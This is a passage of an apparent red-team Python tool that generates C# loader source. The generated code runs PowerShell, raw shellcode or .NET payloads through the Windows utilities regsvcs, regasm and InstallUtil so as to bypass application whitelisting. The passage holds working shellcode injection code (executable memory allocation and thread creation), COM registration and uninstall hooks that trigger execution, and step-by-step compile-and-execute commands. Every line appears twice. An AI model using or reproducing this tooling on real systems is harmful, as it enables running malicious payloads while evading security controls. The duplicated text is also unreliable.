IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(payload, 0, funcAddr, payload.Length); Marshal.Copy(payload, 0, funcAddr, payload.Length);
IntPtr hThread = IntPtr.Zero; IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0; UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF); WaitForSingleObject(hThread, 0xFFFFFFFF);
CloseHandle(hThread); CloseHandle(hThread);
VirtualFree(funcAddr, 0, MEM_RELEASE); VirtualFree(funcAddr, 0, MEM_RELEASE);
}''').safe_substitute( }''').safe_substitute(
payload2 = encodedPayload, payload2 = encodedPayload,
payloadSize = len(payload) payloadSize = len(payload)
) )
launchCode = shellcodeLoader launchCode = shellcodeLoader
else: else:
usings += ''' usings += '''
using System.Management.Automation; using System.Management.Automation;
using System.Management.Automation.Runspaces; using System.Management.Automation.Runspaces;
''' '''
powershellLaunchCode = string.Template(''' powershellLaunchCode = string.Template('''
public static void Execute() { public static void Execute() {
byte[] payload = System.Convert.FromBase64String("$payload2"); byte[] payload = System.Convert.FromBase64String("$payload2");
string decoded = System.Text.Encoding.UTF8.GetString(payload); string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace(); Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open(); runspace.Open();
Pipeline pipeline = runspace.CreatePipeline(); Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded); pipeline.Commands.AddScript(decoded);
pipeline.Invoke(); pipeline.Invoke();
runspace.Close(); runspace.Close();
}''').safe_substitute( }''').safe_substitute(
payload2 = base64.b64encode(payload.encode()).decode() payload2 = base64.b64encode(payload.encode()).decode()
) )
launchCode = powershellLaunchCode launchCode = powershellLaunchCode
template = string.Template(''' template = string.Template('''
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Reflection; using System.Reflection;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using System.EnterpriseServices; using System.EnterpriseServices;
$usings $usings
/* /*
Author: Casey Smith, Twitter: @subTee Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com> Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause License: BSD 3-Clause
Step 1: Create Your Strong Name Key -> key.snk Step 1: Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $key = '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'
$Content = [System.Convert]::FromBase64String($key) $Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte Set-Content key.snk -Value $Content -Encoding Byte
Step 2: Compile source code: Step 2: Compile source code:
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
Step 3: Execute your payload! Step 3: Execute your payload!
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
*/ */
namespace Program namespace Program
{ {
public class Bypass : ServicedComponent public class Bypass : ServicedComponent
{ {
public Bypass() public Bypass()
{ {
} }
// This executes if registration is successful // This executes if registration is successful
[ComRegisterFunction] [ComRegisterFunction]
public static void RegisterClass( string key ) public static void RegisterClass( string key )
{ {
Shellcode.Execute(); Shellcode.Execute();
} }
// This executes if registration fails // This executes if registration fails
[ComUnregisterFunction] [ComUnregisterFunction]
public static void UnRegisterClass( string key ) public static void UnRegisterClass( string key )
{ {
Shellcode.Execute(); Shellcode.Execute();
} }
} }
[System.ComponentModel.RunInstaller(true)] [System.ComponentModel.RunInstaller(true)]
public class ForInstallUtil : System.Configuration.Install.Installer public class ForInstallUtil : System.Configuration.Install.Installer
{ {
// This executes during InstallUtil /U invocation // This executes during InstallUtil /U invocation
public override void Uninstall(System.Collections.IDictionary savedState) public override void Uninstall(System.Collections.IDictionary savedState)
{ {
Shellcode.Execute(); Shellcode.Execute();
} }
} }
public class Shellcode public class Shellcode
{ {
$launchCode $launchCode
} }
}''').safe_substitute( }''').safe_substitute(
launchCode = launchCode, launchCode = launchCode,
usings = usings usings = usings
) )
return template return template
def detectFileIsExe(filePath, forced = False): def detectFileIsExe(filePath, forced = False):
first1000 = [] first1000 = []
with open(filePath, 'rb') as f: with open(filePath, 'rb') as f:
first1000 = f.read()[:1000] first1000 = f.read()[:1000]
if not (first1000[0] == 'M' and first1000[1] == 'Z'): if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False return False
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0] elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'): if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
return False return False
dosStub = "This program cannot be run in DOS mode." dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable]) printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
#if not dosStub in printables: #if not dosStub in printables:
# return False # return False
return True return True
def opts(argv): def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.') parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!') parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.') parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
args = parser.parse_args() args = parser.parse_args()
if args.exe and args.raw: if args.exe and args.raw:
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n') sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
sys.exit(-1) sys.exit(-1)
return args return args
def main(argv): def main(argv):
sys.stderr.write(''' sys.stderr.write('''
:: Rogue .NET Source Code Generation Utility :: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz B. / mgeeky, <mb@binary-offensive.com>
''') ''')
if len(argv) < 2: if len(argv) < 2:
print('Usage: ./generateRogueDotNet.py <inputFile>') print('Usage: ./generateRogueDotNet.py <inputFile>')
sys.exit(-1) sys.exit(-1)
args = opts(argv) args = opts(argv)
_format = 'powershell' _format = 'powershell'
if args.exe: if args.exe:
if not detectFileIsExe(args.inputFile, args.exe): if not detectFileIsExe(args.inputFile, args.exe):
sys.stderr.write('[-] File not recognized as PE/EXE.\n\n') sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
return False return False
_format = 'exe' _format = 'exe'
sys.stderr.write('[+] File recognized as PE/EXE.\n\n') sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
with open(args.inputFile, 'rb') as f: with open(args.inputFile, 'rb') as f:
payload = f.read() payload = f.read()
elif args.raw: elif args.raw:
_format = 'raw' _format = 'raw'
sys.stderr.write('[+] File specified as raw Shellcode.\n\n') sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
with open(args.inputFile, 'rb') as f: with open(args.inputFile, 'rb') as f:
payload = f.read() payload = f.read()
else: else:
sys.stderr.write('[+] Powershell code given.\n') sys.stderr.write('[+] Powershell code given.\n')
if args.inputFile.endswith('.exe'): if args.inputFile.endswith('.exe'):
return False return False
payload = getCompressedPayload(args.inputFile) payload = getCompressedPayload(args.inputFile)
output = getSourceFileContents(payload, _format) output = getSourceFileContents(payload, _format)
print(output) print(output)
management = '' management = ''
if _format == 'powershell': if _format == 'powershell':
management = ' /r:System.Management.Automation.dll' management = ' /r:System.Management.Automation.dll'
commands = ''' commands = '''
===================================== =====================================
NEXT STEPS: NEXT STEPS:
Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory) Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory)
$key = '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' $key = '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'
$Content = [System.Convert]::FromBase64String($key) $Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte Set-Content key.snk -Value $Content -Encoding Byte
Step 2: Compile source code: Step 2: Compile source code:
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
Step 3: Execute your payload! Step 3: Execute your payload!
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll %WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
'''.format(management) '''.format(management)
if 'PROGRAMFILES(X86)' in os.environ: if 'PROGRAMFILES(X86)' in os.environ:
commands = commands.replace('Framework', 'Framework64') commands = commands.replace('Framework', 'Framework64')
sys.stderr.write(commands) sys.stderr.write(commands)
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)